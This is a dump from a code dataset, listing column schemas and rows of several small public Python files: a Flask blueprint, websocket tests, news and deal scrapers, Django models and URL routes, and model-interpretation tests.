blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3833958d6d333505eb722912af50499ce6ee1de7
|
5bddb311ca1f71584446c463b7b0fa41ba4e6ebc
|
/app/order/__init__.py
|
8602730845fab98b9e91f761309799193248691e
|
[] |
no_license
|
a415432669/flask_web_mobile
|
229ccf8deaf0496d4af2506b68987db9b3a4f285
|
bf7efcd6718605d6fbe25643eb635f188e0e2faf
|
refs/heads/master
| 2020-03-18T08:30:55.153454
| 2018-04-07T01:10:35
| 2018-04-07T01:10:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 206
|
py
|
"""订单模块"""
'''
@Time : 2018/4/6 下午12:23
@Author : scrappy_zhang
@File : __init__.py.py
'''
from flask import Blueprint
order = Blueprint('order', __name__)
from app.order import orders
|
[
"a7478317@163.com"
] |
a7478317@163.com
|
d6f1670cbdfa6bfa3c8e5bf382812c7cac608b87
|
dad33400fb9b8d09a0301addd6c964830881d0c0
|
/tests/base_tests/test_ws.py
|
4b949afd962204ad62997e5c8df8ae4e733b491c
|
[
"Zlib"
] |
permissive
|
fy0/slim
|
e63ac112b9a3600e5221da3161fba4a2675c83e0
|
cfdb16ea2365b229b6d0aceb6cb83f45cdb78094
|
refs/heads/master
| 2021-07-06T06:20:46.329917
| 2020-09-17T06:32:20
| 2020-09-17T06:32:20
| 97,494,307
| 50
| 19
|
Zlib
| 2020-10-27T02:39:10
| 2017-07-17T15:54:41
|
Python
|
UTF-8
|
Python
| false
| false
| 3,400
|
py
|
import json
from typing import Dict
import pytest
from slim import Application
from slim.base.ws import WebSocket
from slim.exception import InvalidRouteUrl
from slim.tools.test import make_mocked_ws_request
from slim.utils import async_call
pytestmark = [pytest.mark.asyncio]
app = Application(cookies_secret=b'123456', permission=None)
@app.route.websocket()
class WS(WebSocket):
on_connect_ = []
on_receive_ = []
async def on_connect(self):
await super().on_connect()
for i in self.on_connect_:
await async_call(i, self)
async def on_receive(self, data: [str, bytes]):
for i in self.on_receive_:
i(self, data)
async def on_disconnect(self, code):
await super().on_disconnect(code)
@app.route.websocket()
class WS2(WebSocket):
pass
@app.route.websocket()
class WSSend(WebSocket):
async def on_connect(self):
await super().on_connect()
await self.send(b'111')
await self.send('222')
await self.send_json({'test': [1, 2, 3]})
await self.send_all('222')
await self.send_all_json({'test': [1, 2, 3]})
@app.route.websocket('qqq/:test')
class WS3(WebSocket):
async def on_connect(self):
await super().on_connect()
assert self.match_info == {'test': '1'}
app.prepare()
async def test_websocket_base():
req = await make_mocked_ws_request('/api/ws')
await app(req.scope, req.receive, req.send)
async def test_websocket_on_connect():
req = await make_mocked_ws_request('/api/ws')
flag = 0
assert len(WS.connections) == 0
async def func(ws):
nonlocal flag
flag = 1
assert len(ws.connections) == 1
assert len(WS2.connections) == 0
WS.on_connect_.append(func)
await app(req.scope, req.receive, req.send)
assert flag == 1
async def test_websocket_receive():
req = await make_mocked_ws_request('/api/ws')
recv_lst = [
{'type': 'websocket.connect'},
{'type': 'websocket.receive', 'text': '111'},
{'type': 'websocket.receive', 'bytes': b'222'},
{'type': 'websocket.disconnect', 'code': 1006}
]
async def receive():
if recv_lst:
return recv_lst.pop(0)
def func(ws, data):
assert data == '111'
WS.on_receive_.clear()
WS.on_receive_.append(func2)
def func2(ws, data):
assert data == b'222'
WS.on_receive_.append(func)
await app(req.scope, receive, req.send)
async def test_websocket_send():
req = await make_mocked_ws_request('/api/ws_send') # WSSend
lst = [
{'type': 'websocket.accept'},
{'type': 'websocket.send', 'bytes': b'111'},
{'type': 'websocket.send', 'text': '222'},
{'type': 'websocket.send', 'text': json.dumps({'test': [1, 2, 3]})},
{'type': 'websocket.send', 'text': '222'},
{'type': 'websocket.send', 'text': json.dumps({'test': [1, 2, 3]})},
]
async def send(message):
assert message == lst.pop(0)
await app(req.scope, req.receive, send)
async def test_websocket_regex_route():
req = await make_mocked_ws_request('/api/qqq/1')
await app(req.scope, req.receive, req.send)
async def test_websocket_failed():
route_info, call_kwargs_raw = app.route.query_ws_path('/api/asd')
assert route_info is None
assert call_kwargs_raw is None
|
[
"fy0@qq.com"
] |
fy0@qq.com
|
68d8a31782c2ea1554e0f50b8e59970aa650f14f
|
65b5b1a96b680f975017c25fe7e898ef7818c2dd
|
/scrape.py
|
121860396f8e93526147d43733a8d3bb5b133218
|
[] |
no_license
|
kchatpar/Spark-ML-Classifier
|
2f6e680befd02c8adaa5a23355786b945d396363
|
24366dab209f705be8ea1a7bba86e409ab874f09
|
refs/heads/master
| 2020-03-15T03:33:08.690201
| 2018-12-06T21:11:19
| 2018-12-06T21:11:19
| 131,944,867
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,940
|
py
|
#This script was designed by Krishna Chatpar
#This script uses the keywords Obama, Bonds, Amazon, and Warriors
#to gather articles in the respective categories of: Politics, Finance, Business, and Sportsself.
#Each article is written to a text file in it's respective folder
#
from bs4 import BeautifulSoup
#import urllib.request
#import os.path
from nytimesarticle import articleAPI
from time import sleep
categories = ['Sports','Business','Technology','Politics']
#Loop through each of the four categories and scrape the articles
#Each article is stored in it's own labeled sub folder in a respective file
for i in range(4):
cat = categories[i]
sleep(5)
if cat == 'Politics':
api = articleAPI('4ca755df21fd4011a1e98f306cd2adef')
path = '/Users/krishnachatpar/Desktop/Github/Articles/'+categories[i]
articles = api.search(q="Obama")
url_list=[]
for data in articles['response']['docs']:
url_list.append(data['web_url'])
if not os.path.exists(path):
os.makedirs(path)
for i in range(0,len(url_list)):
file_name = 'data'+str(i)+'.txt'
completeName = os.path.join(path,file_name)
f = open(completeName,'w')
sauce = urllib.request.urlopen(url_list[i]).read()
soup = bs.BeautifulSoup(sauce,'lxml')
for paragraph in soup.find_all('p'):
f.write(paragraph.text)
f.close()
if cat == 'Business':
api = articleAPI('4ca755df21fd4011a1e98f306cd2adef')
path = '/Users/krishnachatpar/Desktop/Github/Articles/'+categories[i]
articles = api.search(q="Bonds")
url_list=[]
for data in articles['response']['docs']:
url_list.append(data['web_url'])
if not os.path.exists(path):
os.makedirs(path)
for i in range(0,len(url_list)):
file_name = 'data'+str(i)+'.txt'
completeName = os.path.join(path,file_name)
f = open(completeName,'w')
sauce = urllib.request.urlopen(url_list[i]).read()
soup = bs.BeautifulSoup(sauce,'lxml')
for paragraph in soup.find_all('p'):
f.write(paragraph.text)
f.close()
if cat == 'Technology':
api = articleAPI('4ca755df21fd4011a1e98f306cd2adef')
path = '/Users/krishnachatpar/Desktop/Github/Articles/'+categories[i]
articles = api.search(q="Amazon")
url_list=[]
for data in articles['response']['docs']:
url_list.append(data['web_url'])
if not os.path.exists(path):
os.makedirs(path)
for i in range(0,len(url_list)):
file_name = 'data'+str(i)+'.txt'
completeName = os.path.join(path,file_name)
f = open(completeName,'w')
sauce = urllib.request.urlopen(url_list[i]).read()
soup = bs.BeautifulSoup(sauce,'lxml')
for paragraph in soup.find_all('p'):
f.write(paragraph.text)
f.close()
if cat == 'Sports':
api = articleAPI('4ca755df21fd4011a1e98f306cd2adef')
path = '/Users/krishnachatpar/Desktop/Github/Articles/'+categories[i]
articles = api.search(q="Warriors")
url_list=[]
for data in articles['response']['docs']:
url_list.append(data['web_url'])
if not os.path.exists(path):
os.makedirs(path)
for i in range(0,len(url_list)):
file_name = 'data'+str(i)+'.txt'
completeName = os.path.join(path,file_name)
f = open(completeName,'w')
sauce = urllib.request.urlopen(url_list[i]).read()
soup = bs.BeautifulSoup(sauce,'lxml')
for paragraph in soup.find_all('p'):
f.write(paragraph.text)
f.close()
|
[
"kchatpar@buffalo.edu"
] |
kchatpar@buffalo.edu
|
d83291ba08687c050825bbfce9c669dc8f086448
|
3c03ecb8e066f2d4eac73a469a75e5906734c66c
|
/_2019_2020/Classworks/_11_16_11_2019/_4.py
|
b7f6f6b64474e765e73e91c52ec9d5e8cd383fc6
|
[] |
no_license
|
waldisjr/JuniorIT
|
af1648095ec36535cc52770b114539444db4cd0b
|
6a67e713708622ae13db6d17b48e43e3d10611f2
|
refs/heads/master
| 2023-03-26T06:29:06.423163
| 2021-03-27T06:27:34
| 2021-03-27T06:27:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 38
|
py
|
for i in range(3,123,3):
print(i)
|
[
"waldis_jr@outlook.com"
] |
waldis_jr@outlook.com
|
2803441b4522bcc0ee4d634e834b3e8509fef88a
|
f422be83dbee1a799b06d8b49003364290a77c4c
|
/examples/sda_train.py
|
441ae790de14e50dae2f24571fb05fc31fe84b64
|
[
"MIT"
] |
permissive
|
shuxjweb/MMT-plus
|
2235302b031345119b535b8087539e94238c9074
|
9b1934afa6ab34b1bb82af54547448914fc3ca7d
|
refs/heads/master
| 2022-12-23T05:11:43.145864
| 2020-09-30T04:42:28
| 2020-09-30T04:42:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,864
|
py
|
from __future__ import print_function, absolute_import
import argparse
import os.path as osp
import random
import numpy as np
import sys
import time
import shutil
import collections
import torch
from torch import nn
from torch.backends import cudnn
from torch.utils.data import DataLoader
from visda import datasets
from visda import models
from visda.evaluators import Evaluator, extract_features
from visda.utils.data import transforms as T
from visda.utils.data import IterLoader
from visda.utils.data.sampler import RandomMultipleGallerySampler, ShuffleBatchSampler
from visda.utils.data.preprocessor import Preprocessor
from visda.utils.logging import Logger
from visda.utils.serialization import load_checkpoint, save_checkpoint, copy_state_dict
from visda.utils.osutils import mkdir_if_missing
from visda.sda.options.train_options import TrainOptions
from visda.sda.models.sda_model import SDAModel
from visda.sda.util.visualizer import Visualizer
from visda.sda.models import networks
start_epoch = best_mAP = 0
def get_data(name, data_dir):
dataset = datasets.create(name, data_dir)
return dataset
def get_train_loader(dataset, height, width, batch_size, workers,
num_instances, iters, trainset=None):
normalizer = T.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
transformers = [T.Resize((height, width), interpolation=3),
T.RandomHorizontalFlip(p=0.5),
T.Pad(10),
T.RandomCrop((height, width)),
T.ToTensor(),
normalizer]
train_transformer = T.Compose(transformers)
train_set = dataset.train if trainset is None else trainset
rmgs_flag = num_instances > 0
if rmgs_flag:
sampler = RandomMultipleGallerySampler(train_set, num_instances)
train_loader = IterLoader(
DataLoader(Preprocessor(train_set, root=dataset.images_dir,
transform=train_transformer),
num_workers=workers, pin_memory=True,
batch_sampler=ShuffleBatchSampler(sampler, batch_size, True)), length=iters)
else:
train_loader = IterLoader(
DataLoader(Preprocessor(train_set, root=dataset.images_dir,
transform=train_transformer),
batch_size=batch_size, num_workers=workers, sampler=None,
shuffle=True, pin_memory=True, drop_last=True), length=iters)
return train_loader
def get_test_loader(dataset, height, width, batch_size, workers, testset=None):
normalizer = T.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
test_transformer = T.Compose([
T.Resize((height, width), interpolation=3),
T.ToTensor(),
normalizer
])
if (testset is None):
testset = list(set(dataset.query) | set(dataset.gallery))
test_loader = DataLoader(
Preprocessor(testset, root=dataset.images_dir, transform=test_transformer),
batch_size=batch_size, num_workers=workers,
shuffle=False, pin_memory=True)
return test_loader
def main():
args = TrainOptions().parse() # get training argsions
args.checkpoints_dir = args.logs_dir
if args.seed is not None:
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed(args.seed)
cudnn.deterministic = True
mkdir_if_missing(args.logs_dir)
main_worker(args)
def main_worker(args):
global start_epoch, best_mAP
args.gpu = None
args.rank = 0
visualizer = Visualizer(args) # create a visualizer that display/save images and plots
total_iters = 0 # the total number of training iterations
cudnn.benchmark = True
sys.stdout = Logger(osp.join(args.logs_dir, 'log.txt'))
print("==========\nArgs:{}\n==========".format(args))
# Create data loaders
iters = args.iters if (args.iters>0) else None
print("==> Load source-domain trainset")
dataset_source = get_data('personx', args.data_dir)
print("==> Load target-domain trainset")
dataset_target = get_data('target_train', args.data_dir)
print("==> Load target-domain valset")
dataset_target_val = get_data('target_val', args.data_dir)
test_loader_target = get_test_loader(dataset_target_val, args.height, args.width, args.batch_size, args.workers)
# Create model
source_classes = dataset_source.num_train_pids
model = SDAModel(args, source_classes) # create a model given args.model and other argsions
# Evaluator
evaluator_reid = Evaluator(model.net_B)
_, mAP = evaluator_reid.evaluate(test_loader_target, dataset_target_val.query, dataset_target_val.gallery)
print('\n * Baseline mAP for target domain: {:5.1%}\n'.format(mAP))
train_loader_source = get_train_loader(dataset_source, args.height, args.width,
args.batch_size, args.workers, args.num_instances, iters)
train_loader_target = get_train_loader(dataset_target, args.height, args.width,
args.batch_size, args.workers, 0, iters)
dataset_size = len(train_loader_source) * args.batch_size
best_mAP_reid = best_mAP_reid_s = best_mAP_gan = 0
for epoch in range(args.niter + args.niter_decay): # outer loop for different epochs; we save the model by <epoch_count>, <epoch_count>+<save_latest_freq>
epoch_start_time = time.time() # timer for entire epoch
train_loader_target.new_epoch()
train_loader_source.new_epoch()
iter_data_time = time.time() # timer for data loading per iteration
epoch_iter = 0
model.set_status_init()
for i in range(len(train_loader_source)): # inner loop within one epoch
source_inputs = train_loader_source.next()
target_inputs = train_loader_target.next()
iter_start_time = time.time() # timer for computation per iteration
if total_iters % args.print_freq == 0:
t_data = iter_start_time - iter_data_time
visualizer.reset()
total_iters += args.batch_size
epoch_iter += args.batch_size
model.set_input(source_inputs, target_inputs) # unpack data from dataset and apply preprocessing
model.optimize_parameters(epoch*len(train_loader_source)+i, epoch) # calculate loss functions, get gradients, update network weights
if total_iters % args.display_freq == 0: # display images on visdom and save images to a HTML file
save_result = total_iters % args.update_html_freq == 0
model.compute_visuals()
visualizer.display_current_results(model.get_current_visuals(), epoch, save_result)
if total_iters % args.print_freq == 0: # print training losses and save logging information to the disk
losses = model.get_current_losses()
t_comp = (time.time() - iter_start_time) / args.batch_size
visualizer.print_current_losses(epoch, epoch_iter, losses, t_comp, t_data)
if args.display_id > 0:
visualizer.plot_current_losses(epoch, float(epoch_iter) / dataset_size, losses)
if total_iters % args.save_latest_freq == 0: # cache our latest model every <save_latest_freq> iterations
print('saving the latest model (epoch %d, total_iters %d)' % (epoch, total_iters))
save_suffix = 'iter_%d' % total_iters if args.save_by_iter else 'latest'
model.save_networks(save_suffix)
iter_data_time = time.time()
if epoch % args.save_epoch_freq == 0: # cache our model every <save_epoch_freq> epochs
print('saving the model at the end of epoch %d, iters %d' % (epoch, total_iters))
model.save_networks('latest')
if ((epoch+1)%args.eval_step==0):
_, mAP = evaluator_reid.evaluate(test_loader_target, dataset_target_val.query, dataset_target_val.gallery)
is_best = (mAP>best_mAP)
best_mAP = max(mAP, best_mAP)
print('\n * Target Domain: Finished epoch [{:3d}] mAP: {:5.1%} best: {:5.1%}{}\n'.
format(epoch, mAP, best_mAP, ' *' if is_best else ''))
print('End of epoch %d / %d \t Time Taken: %d sec' % (epoch, args.niter + args.niter_decay, time.time() - epoch_start_time))
model.update_learning_rate() # update learning rates at the end of every epoch.
if __name__ == '__main__':
main()
|
[
"geyixiao831@gmail.com"
] |
geyixiao831@gmail.com
|
3f42edc91bf39828dbde3f85ff6ae189e63ace53
|
51d1c121a664ddb73c0c149aaf14c8f806a43a67
|
/apps/operation/models.py
|
aa4aedcb113ac8d0272e2768ff04b59bb666ead9
|
[] |
no_license
|
hui-yu1/xwzjOnline
|
9f60e93bf11a6b70aee5756a0ce0260199d292a7
|
aa4a9bea84f3153fc4d63e746e29f0112143dceb
|
refs/heads/master
| 2022-08-24T10:07:21.823558
| 2020-05-22T11:08:11
| 2020-05-22T11:08:11
| 265,725,940
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,301
|
py
|
from datetime import datetime
from django.db import models
from course.models import Course
from users.models import UserProfile
class UserAsk(models.Model):
name = models.CharField('姓名',max_length=20)
mobile = models.CharField('手机',max_length=11)
course_name = models.CharField('课程名',max_length=50)
add_time = models.DateTimeField('添加时间',default=datetime.now)
class Meta:
verbose_name = '用户咨询'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class CourseComments(models.Model):
user = models.ForeignKey(UserProfile,verbose_name='用户',on_delete=models.CASCADE)
course = models.ForeignKey(Course,verbose_name='课程',on_delete=models.CASCADE)
comments = models.CharField('评论',max_length=200)
add_time = models.DateTimeField('添加时间', default=datetime.now)
class Meta:
verbose_name = '课程评论'
verbose_name_plural = verbose_name
class UserFavorite(models.Model):
FAV_TYPE = (
(1,'课程'),
(2,'课程机构'),
(3,'讲师')
)
user = models.ForeignKey(UserProfile,verbose_name='用户',on_delete=models.CASCADE)
fav_id = models.IntegerField('数据id',default=0)
fav_type = models.IntegerField(verbose_name='收藏类型',choices=FAV_TYPE,default=1)
add_time = models.DateTimeField('添加时间', default=datetime.now)
class Meta:
verbose_name = '用户收藏'
verbose_name_plural = verbose_name
class UserMessage(models.Model):
user = models.IntegerField('接受用户',default=0)
message = models.CharField('消息内容',max_length=500)
has_read = models.BooleanField('是否已读',default=False)
add_time = models.DateTimeField('添加时间', default=datetime.now)
class Meta:
verbose_name = '用户消息'
verbose_name_plural = verbose_name
class UserCourse(models.Model):
user = models.ForeignKey(UserProfile,verbose_name='用户',on_delete=models.CASCADE)
course = models.ForeignKey(Course,verbose_name='课程',on_delete=models.CASCADE)
add_time = models.DateTimeField('添加时间', default=datetime.now)
class Meta:
verbose_name = '用户课程'
verbose_name_plural = verbose_name
|
[
"3478474830@qq.com"
] |
3478474830@qq.com
|
1c4a583cefed80075b2f85fe67e37895cd7206c0
|
392569362c0198d491f40d8831be55da10bcd983
|
/agregator/toulouse_agregator.py
|
2be81eec0ff9d9da081949361f5f6d4cad04ac97
|
[] |
no_license
|
JaladeSamuel/se_dashboard
|
4d1e81f5bd613f1d52ea7210b404490450e565c2
|
b45b989712f09c74db7e740aa21287f73535df4e
|
refs/heads/main
| 2023-03-03T18:56:19.740146
| 2021-02-14T00:27:07
| 2021-02-14T00:27:07
| 309,417,659
| 2
| 0
| null | 2021-02-13T23:00:31
| 2020-11-02T15:47:00
| null |
UTF-8
|
Python
| false
| false
| 185
|
py
|
import agregator
if __name__=="__main__":
print("Starting toulouse_agregator")
agregateur1 = agregator.Agregator_moyenne("toulouse_agregator", "toulouse", 43.6047, 1.4435, 2)
|
[
"sam34440@hotmail.fr"
] |
sam34440@hotmail.fr
|
5c40fe7456479483b345430a9c0bac0c99277472
|
d1d93e481679a84b9014280bad2d0b8b6becdb2a
|
/memokeep/urls.py
|
3da020edfa30000b3a29bea2b5f54d010c7b8ed9
|
[
"MIT"
] |
permissive
|
hmarsolla/memokeep-server
|
4c0039494e205b70963acbd727c32b4d0369058e
|
101bc5fb4ee217503cd125cf7c7a769a15c81e76
|
refs/heads/master
| 2020-04-03T05:12:44.851321
| 2018-10-28T05:28:03
| 2018-10-28T05:28:03
| 155,038,451
| 1
| 0
| null | 2018-10-28T05:28:04
| 2018-10-28T05:26:22
|
Python
|
UTF-8
|
Python
| false
| false
| 1,187
|
py
|
"""memokeep URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
# from django.contrib import admin
# from django.urls import path
# urlpatterns = [
# path('admin/', admin.site.urls),
# ]
from django.conf.urls import url, include
from rest_framework import routers
from .memos import views
router = routers.DefaultRouter()
router.register(r'memo', views.MemoViewSet)
# Wire up our API using automatic URL routing.
# Additionally, we include login URLs for the browsable API.
urlpatterns = [
url(r'^', include(router.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
]
|
[
"hmarsolla@hotmail.com"
] |
hmarsolla@hotmail.com
|
9a27d1852a9f71e37950acae46e354fe11668f20
|
010b9b003f71bae2feed4c050ee97a7a806766c5
|
/tests/test_cd.py
|
045eceff17a2ce6816ea3f35d5b2e20a4a2498ea
|
[
"MIT"
] |
permissive
|
SilanHe/hierarchical-dnn-interpretations
|
19c4bb524e80288e61b55ae7bda8a3402f4def51
|
d6f96d0ab6fec48ee53ab930b2660e80525993b9
|
refs/heads/master
| 2022-04-20T15:38:48.677928
| 2020-01-20T18:27:50
| 2020-01-20T18:27:50
| 255,742,196
| 0
| 0
|
MIT
| 2020-04-14T22:29:59
| 2020-04-14T22:29:58
| null |
UTF-8
|
Python
| false
| false
| 4,957
|
py
|
import numpy as np
import torch
import sys
import acd
import pickle as pkl
import warnings
warnings.filterwarnings("ignore")
def test_sst(device='cpu'):
# load the model and data
sys.path.append('../dsets/sst')
from dsets.sst.model import LSTMSentiment
sst_pkl = pkl.load(open('../dsets/sst/sst_vocab.pkl', 'rb'))
model = torch.load('../dsets/sst/sst.model', map_location=device)
model.device = device
# text and label
sentence = ['a', 'great', 'ensemble', 'cast', 'ca', 'n\'t', 'lift', 'this', 'heartfelt', 'enterprise', 'out', 'of', 'the', 'familiar', '.'] # note this is a real example from the dataset
def batch_from_str_list(s):
# form class to hold data
class B:
text = torch.zeros(1).to(device)
batch = B()
nums = np.expand_dims(np.array([sst_pkl['stoi'][x] for x in s]).transpose(), axis=1)
batch.text = torch.LongTensor(nums).to(device) #cuda()
return batch
# prepare inputs
batch = batch_from_str_list(sentence)
preds = model(batch).data.cpu().numpy()[0] # predict
# check that full sentence = prediction
preds = preds - model.hidden_to_label.bias.detach().numpy()
cd_score, irrel_scores = acd.cd_text(batch, model, start=0, stop=len(sentence), return_irrel_scores=True)
assert(np.allclose(cd_score, preds, atol=1e-2))
assert(np.allclose(irrel_scores, irrel_scores * 0, atol=1e-2))
# check that rel + irrel = prediction for another subset
cd_score, irrel_scores = acd.cd_text(batch, model, start=3, stop=len(sentence), return_irrel_scores=True)
assert(np.allclose(cd_score + irrel_scores, preds, atol=1e-2))
def test_mnist(device='cuda'):
# load the dataset
sys.path.append('../dsets/mnist')
import dsets.mnist.model
device = 'cuda'
im_torch = torch.randn(1, 1, 28, 28).to(device)
# load the model
model = dsets.mnist.model.Net().to(device)
model.load_state_dict(torch.load('../dsets/mnist/mnist.model', map_location=device))
model = model.eval()
# check that full image mask = prediction
preds = model.logits(im_torch).cpu().detach().numpy()
cd_score, irrel_scores = acd.cd(im_torch, model, mask=np.ones((1, 1, 28, 28)), model_type='mnist', device=device)
cd_score = cd_score.cpu().detach().numpy()
irrel_scores = irrel_scores.cpu().detach().numpy()
assert(np.allclose(cd_score, preds, atol=1e-2))
assert(np.allclose(irrel_scores, irrel_scores * 0, atol=1e-2))
# check that rel + irrel = prediction for another subset
# preds = preds - model.hidden_to_label.bias.detach().numpy()
mask = np.zeros((28, 28))
mask[:14] = 1
cd_score, irrel_scores = acd.cd(im_torch, model, mask=mask, model_type='mnist', device=device)
cd_score = cd_score.cpu().detach().numpy()
irrel_scores = irrel_scores.cpu().detach().numpy()
assert(np.allclose(cd_score + irrel_scores, preds, atol=1e-2))
def test_imagenet(device='cuda', arch='vgg'):
# get dataset
from torchvision import models
imnet_dict = pkl.load(open('../dsets/imagenet/imnet_dict.pkl', 'rb')) # contains 6 images (keys: 9, 10, 34, 20, 36, 32)
# get model and image
if arch == 'vgg':
model = models.vgg16(pretrained=True).to(device).eval()
elif arch == 'alexnet':
model = models.alexnet(pretrained=True).to(device).eval()
elif arch == 'resnet18':
model = models.resnet18(pretrained=True).to(device).eval()
im_torch = torch.randn(1, 3, 224, 224).to(device)
# get predictions
preds = model(im_torch).cpu().detach().numpy()
# check that rel + irrel = prediction for another subset
mask = np.ones((1, 3, 224, 224))
mask[:, :, :14] = 1
cd_score, irrel_scores = acd.cd(im_torch, model, mask=mask, device=device, model_type=arch)
cd_score = cd_score.cpu().detach().numpy()
irrel_scores = irrel_scores.cpu().detach().numpy()
assert(np.allclose(cd_score + irrel_scores, preds, atol=1e-2))
# check that full image mask = prediction
cd_score, irrel_scores = acd.cd(im_torch, model, mask=np.ones((1, 3, 224, 224)), device=device, model_type=arch)
cd_score = cd_score.cpu().detach().numpy()
irrel_scores = irrel_scores.cpu().detach().numpy()
# print(cd_score.flatten()[:5], irrel_scores.flatten()[:5], preds.flatten()[:5])
assert(np.allclose(cd_score, preds, atol=1e-2))
assert(np.allclose(irrel_scores, irrel_scores * 0, atol=1e-2))
if __name__ == '__main__':
print('testing sst...')
test_sst()
print('testing mnist...')
test_mnist()
print('testing imagenet vgg...')
test_imagenet(arch='vgg')
print('testing imagenet alexnet...')
test_imagenet(arch='alexnet')
print('testing imagenet resnet18...')
with torch.no_grad():
test_imagenet(arch='resnet18')
print('all tests passed!')
# loop over device types?
# try without torch.no_grad()?
|
[
"chandan_singh@berkeley.edu"
] |
chandan_singh@berkeley.edu
|
ab8552e93d0f54492fb7640136c1d3cda1b0c205
|
3ac96cdcca7e948f67739c66a56558bd88cb9724
|
/1st_prjct_SlickDeals/webscrape.py
|
ff830646b00fef0bc983e02146bdf0b2d68379fa
|
[] |
no_license
|
suatakbulut/webscrape
|
309fed38efb7734c3da681f28fbf3cf024f1dd04
|
1a6658dda99366d811e664112e39ffa06d7b5d42
|
refs/heads/master
| 2020-12-13T13:24:35.295454
| 2020-01-17T06:54:10
| 2020-01-17T06:54:10
| 234,431,705
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,168
|
py
|
"""
In this project, I will scrape data Frontpage Slickdeals from slickdeals.net.
For each deal, I will collect the information about the following:
Vendor Name
Item Name
List Price (If available)
Discounted price
"""
from bs4 import BeautifulSoup as soup
import requests as Req
# The url of the website we want to scrape data from
my_url = "https://slickdeals.net/"
page_url = Req.get(my_url)
page_soup = soup(page_url.content, "html.parser")
"""
Now we have all the information on the website.
But it is all garbled, just like a bowl of soup
We need to find what we are looking for and get it.
There are multiple ways to obtain those list items.
Observing that each deal is in a division with class name fpItem
I will choose all division with that class name
PS: At this stage https://beautifier.io/ is really nice source
to better see the structure of the website
"""
deals = page_soup.findAll("div", attrs={"class":"fpItem"})
header = "Deal Name, Vendor, Original Price, Discounted Price\n"
"""
For a given container deal, which is a bs4 element, following functions will
find and return the
- Item's Name
- Vendor's Name
- Original List Price
- Discounted Price
"""
def itemTitle(deal):
return deal.find("a", attrs={"class":"itemTitle"}).text.strip().replace(",", "|")
def itemStore(deal):
try:
return deal.find("a", attrs={"class":"itemStore"}).text.strip()
except:
return deal.find("span", attrs={"class":"itemStore"}).text.strip()
def listPrice(deal):
try:
return deal.find("div", attrs={"class":"listPrice"}).text.strip()
except:
try:
return deal.find("span", attrs={"class":"oldListPrice"}).text.strip()
except:
return 'Not Available'
def itemPrice(deal):
p = deal.find("div", attrs={"class":"itemPrice"}).text.strip().split("\n")[0].strip().replace(",", "")
if "%" in p:
return "Not Available"
else:
return p
f = open("Deals.csv", "w")
f.write(header)
for deal in deals[1:-2]:
line = itemTitle(deal) + "," + itemStore(deal) + "," + listPrice(deal) + "," + itemPrice(deal)+ "\n"
f.write(line)
f.close()
|
[
"sqa5456@psu.edu"
] |
sqa5456@psu.edu
|
2577704640f0cc5286b607bd56b60a6de915bd47
|
40d740712137b8004fc26f04cecdc852d59d88fd
|
/Test/Python编码/struct.py
|
267b686f1d9e5bfe8159cb45498820cabe7172e9
|
[] |
no_license
|
xiaohua0877/python_prog
|
d164c8e03fbf6f5cd3cf52da3764bbc3ac2be871
|
38d8999f8e5cc3137a904c1aa1605cb17781dba6
|
refs/heads/master
| 2020-06-19T19:22:34.050242
| 2019-08-18T14:32:18
| 2019-08-18T14:32:18
| 196,841,172
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 724
|
py
|
__all__ = [
# Functions
'calcsize', 'pack', 'pack_into', 'unpack', 'unpack_from',
'iter_unpack',
# Classes
'Struct',
# Exceptions
'error'
]
from _struct import *
from _struct import _clearcache
from _struct import __doc__
#from struct import *
#
# b = pack('hhl', 1, 2, 3)
# print(b)
# b = unpack('hhl', b'\x01\x00\x02\x00\x03\x00\x00\x00')
# print(b)
# b = calcsize('hhl')
# print(b)
record = b'raymond \x32\x12\x08\x01\x08'
name, serialnum, school, gradelevel = unpack('<10sHHb', record)
from collections import namedtuple
Student = namedtuple('Student', 'name serialnum school gradelevel')
b = Student._make(unpack('<10sHHb', record))
print(b)
b = pack('ci', b'*', 0x12131415)
print(b)
|
[
"xiaohua0877@sina.com"
] |
xiaohua0877@sina.com
|
bb48173d9cf8d2bfe7985c5298c639658b8b1863
|
d67261e0f768ffc729fa0002a693169549d94517
|
/projects/act/tutorial_manim/positions.py
|
623c2c5e0aa0196f2ea9ef71dd2bb2fa24931e51
|
[] |
no_license
|
gmile/Manim-TB
|
